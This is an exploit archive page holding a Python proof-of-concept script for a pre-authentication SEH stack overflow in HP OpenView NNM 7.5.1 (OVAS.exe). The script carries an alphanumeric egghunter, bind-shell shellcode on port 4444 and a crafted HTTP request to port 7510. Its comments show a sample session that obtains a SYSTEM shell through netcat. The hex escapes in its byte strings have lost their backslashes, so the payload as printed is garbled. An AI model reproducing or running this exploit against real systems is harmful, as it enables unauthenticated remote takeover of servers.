hpopenviewnnm-overflow.txt
Posted on 03 April 2008
#!/usr/bin/python ################################################################################ # HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow # Tested on Windows 2003 Server SP1. # Coded by Mati Aharoni # muts..at..offensive-security.com # http://www.offensive-security.com/0day/hp-nnm-ov.py.txt # [shameless plug] # This vulnerability was found, analysed and exploited # as part of a training module in "BackTrack to the Max". # http://www.offensive-security.com/ilt.php # [/shameless plug] ################################################################################# # bt 0day# python hp-nnm-ov.py # [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day) # [*] http://www.offensive-security.com # [*] Sending evil HTTP request to NNMz, ph33r # [*] Egghunter working ... # [*] Check payload results - may take up to a minute. # bt 0day# nc -v 192.168.1.111 4444 # (muts) [192.168.1.111] 4444 (krb524) open # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # C:>whoami # whoami # nt authoritysystem # # C:> # ################################################################################ # Insane, "We own all those registers, but how the heck do we get EIP" method. ################################################################################ # crash = "T"*1300 # ################################################################################# # Funky, "Lets make the stack happy and pray for EIP" overwrite method. ################################################################################# # Case 1 - Stack not happy: # crash = "T"*989 # # Case 2 - Stack happy, we own EIP - blessed by the angels above: # 0x44442638 - Happy NNM address # crash = "T"*941 +"x38x26x44x44"+"x42x42x42x42" +"T"*12 +"x41x41x41x41" + "T"*24+":7510"+"x41x41x41x41" + "B"*24+":7510" # 12 bytes of nasty strict alphanum shellcode possibility @EBP # ################################################################################ # Unknown "wtf, these bytes are expanding" SEH method: ################################################################################ # 0x6d356c6e - POP POP RET somewhere in NNM # crash = "xeb"*1100+"A"*9+"x41x41x41x41"+"A"*1900+":7510" # ################################################################################ # Final exploit crash SEH method: ################################################################################ # crash = "xeb"*1101 +"x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 + egghunter +"A"*100+":7510" # ################################################################################ import socket import os import sys print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)" print "[*] http://www.offensive-security.com" # Alphanumeric egghunter shellcode + restricted chars x40x3fx3ax2f - ph33r # One egg to rule them all. egghunter=( "%JMNU%521*TX-1MUU-1KUU-5QUUPAA%J" "MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" "21*-q!au-q!au-oGSePAA%JMNU%521*-D" "A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" "z1E-oRHEPAA%JMNU%521*-3s1--331--^" "TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA" "A%JMNU%521*-R222-1111-nZJ2PAA%JMN" "U%521*-1-wD-1-wD-8$GwP") alignstack="x90"*34+"x83xc4x03" # win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com # Spawned shell dies quickly as a result of a parent thread killing it. # Best shellcodes are of the "instant" type, such as adduser, etc. bindshell=("T00WT00W" + alignstack + "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" "x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48" "x4ex46x46x32x46x42x4bx48x45x54x4ex33x4bx38x4ex37" "x45x30x4ax37x41x30x4fx4ex4bx38x4fx54x4ax41x4bx48" "x4fx35x42x32x41x50x4bx4ex49x34x4bx58x46x43x4bx58" "x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c" "x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx53x46x55x46x32x4ax32x45x37x45x4ex4bx48" "x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx54" "x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex32x4bx38" "x49x58x4ex46x46x52x4ex31x41x56x43x4cx41x53x4bx4d" "x46x46x4bx58x43x44x42x33x4bx38x42x54x4ex30x4bx48" "x42x47x4ex51x4dx4ax4bx48x42x34x4ax50x50x35x4ax36" "x50x38x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x56" "x43x55x48x56x4ax46x43x53x44x43x4ax36x47x57x43x57" "x44x33x4fx35x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e" "x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e" "x48x56x41x38x4dx4ex4ax50x44x30x45x45x4cx46x44x30" "x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x55" "x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x45x43x44" "x43x35x43x54x43x55x4fx4fx42x4dx48x36x4ax46x41x31" "x4ex55x48x46x43x55x49x58x41x4ex45x59x4ax56x46x4a" "x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx56x42x51" "x41x35x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32" "x49x4ex47x35x4fx4fx48x4dx43x35x45x35x4fx4fx42x4d" "x4ax56x45x4ex49x34x48x48x49x44x47x45x4fx4fx48x4d" "x42x55x46x55x46x35x45x45x4fx4fx42x4dx43x59x4ax46" "x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45" "x4fx4fx42x4dx48x56x4cx56x46x56x48x46x4ax46x43x56" "x4dx36x49x58x45x4ex4cx56x42x45x49x45x49x42x4ex4c" "x49x38x47x4ex4cx36x46x44x49x38x44x4ex41x33x42x4c" "x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x44x4ex32" "x43x39x4dx38x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax46" "x44x57x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f" "x48x4dx4bx35x47x45x44x55x41x55x41x55x41x35x4cx56" "x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56" "x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx36" "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x55x4ex4f" "x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d" "x4ax56x4fx4ex50x4cx42x4ex42x56x43x35x4fx4fx48x4d" "x4fx4fx42x4dx5a") # 0x6d356c6e pop pot ret somehwere in NNM 7.5.1 evilcrash = "xeb"*1101 + "x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 +egghunter + "A"*100 + ":7510" buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1 " buffer+="Content-Type: application/x-www-form-urlencoded " buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03 " buffer+="Content-Length: 1048580 " buffer+= bindshell print "[*] Sending evil HTTP request to NNMz, ph33r" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("192.168.1.111", 7510)) expl.send(buffer) expl.close() print "[*] Egghunter working ..." print "[*] Check payload results - may take up to a minute."
